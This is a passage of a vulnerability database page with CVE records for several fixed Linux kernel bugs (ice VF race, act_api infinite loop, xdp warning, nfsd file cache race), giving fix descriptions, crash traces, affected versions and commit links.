"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix concurrent reset and removal of VFs\n\nCommit c503e63200c6 (\"ice: Stop processing VF messages during teardown\")\nintroduced a driver state flag, ICE_VF_DEINIT_IN_PROGRESS, which is\nintended to prevent some issues with concurrently handling messages from\nVFs while tearing down the VFs.\n\nThis change was motivated by crashes caused while tearing down and\nbringing up VFs in rapid succession.\n\nIt turns out that the fix actually introduces issues with the VF driver\ncaused because the PF no longer responds to any messages sent by the VF\nduring its .remove routine. This results in the VF potentially removing\nits DMA memory before the PF has shut down the device queues.\n\nAdditionally, the fix doesn\u0027t actually resolve concurrency issues within\nthe ice driver. It is possible for a VF to initiate a reset just prior\nto the ice driver removing VFs. This can result in the remove task\nconcurrently operating while the VF is being reset. This results in\nsimilar memory corruption and panics purportedly fixed by that commit.\n\nFix this concurrency at its root by protecting both the reset and\nremoval flows using the existing VF cfg_lock. This ensures that we\ncannot remove the VF while any outstanding critical tasks such as a\nvirtchnl message or a reset are occurring.\n\nThis locking change also fixes the root cause originally fixed by commit\nc503e63200c6 (\"ice: Stop processing VF messages during teardown\"), so we\ncan simply revert it.\n\nNote that I kept these two changes together because simply reverting the\noriginal commit alone would leave the driver vulnerable to worse race\nconditions."
}
],
"providerMetadata": {
"dateUpdated": "2025-06-19T12:39:05.898Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3c805fce07c9dbc47d8a9129c7c5458025951957"
},
{
"url": "https://git.kernel.org/stable/c/2a3e61de89bab6696aa28b70030eb119968c5586"
},
{
"url": "https://git.kernel.org/stable/c/fadead80fe4c033b5e514fcbadd20b55c4494112"
}
],
"title": "ice: fix concurrent reset and removal of VFs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48941",
"datePublished": "2024-08-22T03:31:37.120Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-06-19T12:39:05.898Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-40995 (GCVE-0-2024-40995)
Vulnerability from cvelistv5
Published
2024-07-12 12:37
Modified
2025-05-04 09:19
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc()
syzbot found hanging tasks waiting on rtnl_lock [1]
A reproducer is available in the syzbot bug.
When a request to add multiple actions with the same index is sent, the
second request will block forever on the first request. This holds
rtnl_lock, and causes tasks to hang.
Return -EAGAIN to prevent infinite looping, while keeping documented
behavior.
[1]
INFO: task kworker/1:0:5088 blocked for more than 143 seconds.
Not tainted 6.9.0-rc4-syzkaller-00173-g3cdb45594619 #0
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:kworker/1:0 state:D stack:23744 pid:5088 tgid:5088 ppid:2 flags:0x00004000
Workqueue: events_power_efficient reg_check_chans_work
Call Trace:
<TASK>
context_switch kernel/sched/core.c:5409 [inline]
__schedule+0xf15/0x5d00 kernel/sched/core.c:6746
__schedule_loop kernel/sched/core.c:6823 [inline]
schedule+0xe7/0x350 kernel/sched/core.c:6838
schedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:6895
__mutex_lock_common kernel/locking/mutex.c:684 [inline]
__mutex_lock+0x5b8/0x9c0 kernel/locking/mutex.c:752
wiphy_lock include/net/cfg80211.h:5953 [inline]
reg_leave_invalid_chans net/wireless/reg.c:2466 [inline]
reg_check_chans_work+0x10a/0x10e0 net/wireless/reg.c:2481
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 Version: 0190c1d452a91c38a3462abdd81752be1b9006a8 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:39:56.074Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d8a2d287c8a394c0d4653f0c6c7be4c688e5a74"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c6a7da65a296745535a964be1019ec7691b0cb90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/25987a97eec4d5f897cd04ee1b45170829c610da"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fc78d67f51aeb9a542d39a8714e16bc411582d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f926aa96b08b6c47178fe1171e7ae331c695fc2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a0e497b597df7c4cf2b63fc6e9188b6cabe5335"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d864319871b05fadd153e0aede4811ca7008f5d6"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-40995",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:01:35.312165Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:19.797Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/act_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0d8a2d287c8a394c0d4653f0c6c7be4c688e5a74",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
},
{
"lessThan": "c6a7da65a296745535a964be1019ec7691b0cb90",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
},
{
"lessThan": "25987a97eec4d5f897cd04ee1b45170829c610da",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
},
{
"lessThan": "6fc78d67f51aeb9a542d39a8714e16bc411582d4",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
},
{
"lessThan": "5f926aa96b08b6c47178fe1171e7ae331c695fc2",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
},
{
"lessThan": "7a0e497b597df7c4cf2b63fc6e9188b6cabe5335",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
},
{
"lessThan": "d864319871b05fadd153e0aede4811ca7008f5d6",
"status": "affected",
"version": "0190c1d452a91c38a3462abdd81752be1b9006a8",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/act_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.96",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.36",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.96",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.36",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.7",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc()\n\nsyzbot found hanging tasks waiting on rtnl_lock [1]\n\nA reproducer is available in the syzbot bug.\n\nWhen a request to add multiple actions with the same index is sent, the\nsecond request will block forever on the first request. This holds\nrtnl_lock, and causes tasks to hang.\n\nReturn -EAGAIN to prevent infinite looping, while keeping documented\nbehavior.\n\n[1]\n\nINFO: task kworker/1:0:5088 blocked for more than 143 seconds.\nNot tainted 6.9.0-rc4-syzkaller-00173-g3cdb45594619 #0\n\"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\ntask:kworker/1:0 state:D stack:23744 pid:5088 tgid:5088 ppid:2 flags:0x00004000\nWorkqueue: events_power_efficient reg_check_chans_work\nCall Trace:\n\u003cTASK\u003e\ncontext_switch kernel/sched/core.c:5409 [inline]\n__schedule+0xf15/0x5d00 kernel/sched/core.c:6746\n__schedule_loop kernel/sched/core.c:6823 [inline]\nschedule+0xe7/0x350 kernel/sched/core.c:6838\nschedule_preempt_disabled+0x13/0x30 kernel/sched/core.c:6895\n__mutex_lock_common kernel/locking/mutex.c:684 [inline]\n__mutex_lock+0x5b8/0x9c0 kernel/locking/mutex.c:752\nwiphy_lock include/net/cfg80211.h:5953 [inline]\nreg_leave_invalid_chans net/wireless/reg.c:2466 [inline]\nreg_check_chans_work+0x10a/0x10e0 net/wireless/reg.c:2481"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:19:36.408Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0d8a2d287c8a394c0d4653f0c6c7be4c688e5a74"
},
{
"url": "https://git.kernel.org/stable/c/c6a7da65a296745535a964be1019ec7691b0cb90"
},
{
"url": "https://git.kernel.org/stable/c/25987a97eec4d5f897cd04ee1b45170829c610da"
},
{
"url": "https://git.kernel.org/stable/c/6fc78d67f51aeb9a542d39a8714e16bc411582d4"
},
{
"url": "https://git.kernel.org/stable/c/5f926aa96b08b6c47178fe1171e7ae331c695fc2"
},
{
"url": "https://git.kernel.org/stable/c/7a0e497b597df7c4cf2b63fc6e9188b6cabe5335"
},
{
"url": "https://git.kernel.org/stable/c/d864319871b05fadd153e0aede4811ca7008f5d6"
}
],
"title": "net/sched: act_api: fix possible infinite loop in tcf_idr_check_alloc()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-40995",
"datePublished": "2024-07-12T12:37:37.791Z",
"dateReserved": "2024-07-12T12:17:45.607Z",
"dateUpdated": "2025-05-04T09:19:36.408Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42082 (GCVE-0-2024-42082)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xdp: Remove WARN() from __xdp_reg_mem_model()
syzkaller reports a warning in __xdp_reg_mem_model().
The warning occurs only if __mem_id_init_hash_table() returns an error. It
returns the error in two cases:
1. memory allocation fails;
2. rhashtable_init() fails when some fields of rhashtable_params
struct are not initialized properly.
The second case cannot happen since there is a static const rhashtable_params
struct with valid fields. So, warning is only triggered when there is a
problem with memory allocation.
Thus, there is no sense in using WARN() to handle this error and it can be
safely removed.
WARNING: CPU: 0 PID: 5065 at net/core/xdp.c:299 __xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299
CPU: 0 PID: 5065 Comm: syz-executor883 Not tainted 6.8.0-syzkaller-05271-gf99c5f563c17 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
RIP: 0010:__xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299
Call Trace:
xdp_reg_mem_model+0x22/0x40 net/core/xdp.c:344
xdp_test_run_setup net/bpf/test_run.c:188 [inline]
bpf_test_run_xdp_live+0x365/0x1e90 net/bpf/test_run.c:377
bpf_prog_test_run_xdp+0x813/0x11b0 net/bpf/test_run.c:1267
bpf_prog_test_run+0x33a/0x3b0 kernel/bpf/syscall.c:4240
__sys_bpf+0x48d/0x810 kernel/bpf/syscall.c:5649
__do_sys_bpf kernel/bpf/syscall.c:5738 [inline]
__se_sys_bpf kernel/bpf/syscall.c:5736 [inline]
__x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5736
do_syscall_64+0xfb/0x240
entry_SYSCALL_64_after_hwframe+0x6d/0x75
Found by Linux Verification Center (linuxtesting.org) with syzkaller.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 8d5d88527587516bd58ff0f3810f07c38e65e2be Version: 8d5d88527587516bd58ff0f3810f07c38e65e2be Version: 8d5d88527587516bd58ff0f3810f07c38e65e2be Version: 8d5d88527587516bd58ff0f3810f07c38e65e2be Version: 8d5d88527587516bd58ff0f3810f07c38e65e2be Version: 8d5d88527587516bd58ff0f3810f07c38e65e2be |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.586Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1095b8efbb13a6a5fa583ed373ee1ccab29da2d0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14e51ea78b4ccacb7acb1346b9241bb790a2054c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f92298b0467fd77edc4c1a2c3e48833e69840ec4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7e9f79428372c6eab92271390851be34ab26bfb4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42082",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:19:06.855038Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:07.377Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1095b8efbb13a6a5fa583ed373ee1ccab29da2d0",
"status": "affected",
"version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
"versionType": "git"
},
{
"lessThan": "1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54",
"status": "affected",
"version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
"versionType": "git"
},
{
"lessThan": "4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2",
"status": "affected",
"version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
"versionType": "git"
},
{
"lessThan": "14e51ea78b4ccacb7acb1346b9241bb790a2054c",
"status": "affected",
"version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
"versionType": "git"
},
{
"lessThan": "f92298b0467fd77edc4c1a2c3e48833e69840ec4",
"status": "affected",
"version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
"versionType": "git"
},
{
"lessThan": "7e9f79428372c6eab92271390851be34ab26bfb4",
"status": "affected",
"version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/xdp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxdp: Remove WARN() from __xdp_reg_mem_model()\n\nsyzkaller reports a warning in __xdp_reg_mem_model().\n\nThe warning occurs only if __mem_id_init_hash_table() returns an error. It\nreturns the error in two cases:\n\n 1. memory allocation fails;\n 2. rhashtable_init() fails when some fields of rhashtable_params\n struct are not initialized properly.\n\nThe second case cannot happen since there is a static const rhashtable_params\nstruct with valid fields. So, warning is only triggered when there is a\nproblem with memory allocation.\n\nThus, there is no sense in using WARN() to handle this error and it can be\nsafely removed.\n\nWARNING: CPU: 0 PID: 5065 at net/core/xdp.c:299 __xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299\n\nCPU: 0 PID: 5065 Comm: syz-executor883 Not tainted 6.8.0-syzkaller-05271-gf99c5f563c17 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\nRIP: 0010:__xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299\n\nCall Trace:\n xdp_reg_mem_model+0x22/0x40 net/core/xdp.c:344\n xdp_test_run_setup net/bpf/test_run.c:188 [inline]\n bpf_test_run_xdp_live+0x365/0x1e90 net/bpf/test_run.c:377\n bpf_prog_test_run_xdp+0x813/0x11b0 net/bpf/test_run.c:1267\n bpf_prog_test_run+0x33a/0x3b0 kernel/bpf/syscall.c:4240\n __sys_bpf+0x48d/0x810 kernel/bpf/syscall.c:5649\n __do_sys_bpf kernel/bpf/syscall.c:5738 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:5736 [inline]\n __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5736\n do_syscall_64+0xfb/0x240\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nFound by Linux Verification Center (linuxtesting.org) with syzkaller."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:35.267Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1095b8efbb13a6a5fa583ed373ee1ccab29da2d0"
},
{
"url": "https://git.kernel.org/stable/c/1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54"
},
{
"url": "https://git.kernel.org/stable/c/4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2"
},
{
"url": "https://git.kernel.org/stable/c/14e51ea78b4ccacb7acb1346b9241bb790a2054c"
},
{
"url": "https://git.kernel.org/stable/c/f92298b0467fd77edc4c1a2c3e48833e69840ec4"
},
{
"url": "https://git.kernel.org/stable/c/7e9f79428372c6eab92271390851be34ab26bfb4"
}
],
"title": "xdp: Remove WARN() from __xdp_reg_mem_model()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42082",
"datePublished": "2024-07-29T15:52:43.989Z",
"dateReserved": "2024-07-29T15:50:41.170Z",
"dateUpdated": "2025-05-04T09:22:35.267Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52909 (GCVE-0-2023-52909)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix handling of cached open files in nfsd4_open codepath
Commit fb70bf124b05 ("NFSD: Instantiate a struct file when creating a
regular NFSv4 file") added the ability to cache an open fd over a
compound. There are a couple of problems with the way this currently
works:
It's racy, as a newly-created nfsd_file can end up with its PENDING bit
cleared while the nf is hashed, and the nf_file pointer is still zeroed
out. Other tasks can find it in this state and they expect to see a
valid nf_file, and can oops if nf_file is NULL.
Also, there is no guarantee that we'll end up creating a new nfsd_file
if one is already in the hash. If an extant entry is in the hash with a
valid nf_file, nfs4_get_vfs_file will clobber its nf_file pointer with
the value of op_file and the old nf_file will leak.
Fix both issues by making a new nfsd_file_acquirei_opened variant that
takes an optional file pointer. If one is present when this is called,
we'll take a new reference to it instead of trying to open the file. If
the nfsd_file already has a valid nf_file, we'll just ignore the
optional file and pass the nfsd_file back as-is.
Also rework the tracepoints a bit to allow for an "opened" variant and
don't try to avoid counting acquisitions in the case where we already
have a cached open file.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52909",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:02.157963Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:12.921Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nfsd/filecache.c",
"fs/nfsd/filecache.h",
"fs/nfsd/nfs4state.c",
"fs/nfsd/trace.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "45c08a752982116f3287afcd1bd9c50f4fab0c28",
"status": "affected",
"version": "c20097329d2c196b818c4666c7820c1378d69d61",
"versionType": "git"
},
{
"lessThan": "0b778361998d6c6356b8d2fc7ddf025fb3224654",
"status": "affected",
"version": "106331a12b0fa5afa6995b1f9ebb03ddcaac6915",
"versionType": "git"
},
{
"lessThan": "973acfdfe90c8a4e58ade97ff0653a498531ff2e",
"status": "affected",
"version": "fb70bf124b051d4ded4ce57511dfec6d3ebf2b43",
"versionType": "git"
},
{
"lessThan": "0b3a551fa58b4da941efeb209b3770868e2eddd7",
"status": "affected",
"version": "fb70bf124b051d4ded4ce57511dfec6d3ebf2b43",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nfsd/filecache.c",
"fs/nfsd/filecache.h",
"fs/nfsd/nfs4state.c",
"fs/nfsd/trace.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.19"
},
{
"lessThan": "5.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: fix handling of cached open files in nfsd4_open codepath\n\nCommit fb70bf124b05 (\"NFSD: Instantiate a struct file when creating a\nregular NFSv4 file\") added the ability to cache an open fd over a\ncompound. There are a couple of problems with the way this currently\nworks:\n\nIt\u0027s racy, as a newly-created nfsd_file can end up with its PENDING bit\ncleared while the nf is hashed, and the nf_file pointer is still zeroed\nout. Other tasks can find it in this state and they expect to see a\nvalid nf_file, and can oops if nf_file is NULL.\n\nAlso, there is no guarantee that we\u0027ll end up creating a new nfsd_file\nif one is already in the hash. If an extant entry is in the hash with a\nvalid nf_file, nfs4_get_vfs_file will clobber its nf_file pointer with\nthe value of op_file and the old nf_file will leak.\n\nFix both issues by making a new nfsd_file_acquirei_opened variant that\ntakes an optional file pointer. If one is present when this is called,\nwe\u0027ll take a new reference to it instead of trying to open the file. If\nthe nfsd_file already has a valid nf_file, we\u0027ll just ignore the\noptional file and pass the nfsd_file back as-is.\n\nAlso rework the tracepoints a bit to allow for an \"opened\" variant and\ndon\u0027t try to avoid counting acquisitions in the case where we already\nhave a cached open file."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:49.273Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/45c08a752982116f3287afcd1bd9c50f4fab0c28"
},
{
"url": "https://git.kernel.org/stable/c/0b778361998d6c6356b8d2fc7ddf025fb3224654"
},
{
"url": "https://git.kernel.org/stable/c/973acfdfe90c8a4e58ade97ff0653a498531ff2e"
},
{
"url": "https://git.kernel.org/stable/c/0b3a551fa58b4da941efeb209b3770868e2eddd7"
}
],
"title": "nfsd: fix handling of cached open files in nfsd4_open codepath",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
